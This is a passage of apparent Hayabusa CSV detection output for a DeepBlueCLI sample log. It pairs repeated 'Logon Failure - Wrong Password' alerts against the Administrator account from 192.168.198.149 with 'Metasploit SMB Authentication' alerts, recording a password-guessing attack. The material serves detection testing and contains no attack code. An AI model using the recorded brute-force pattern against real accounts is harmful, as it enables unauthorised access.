Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 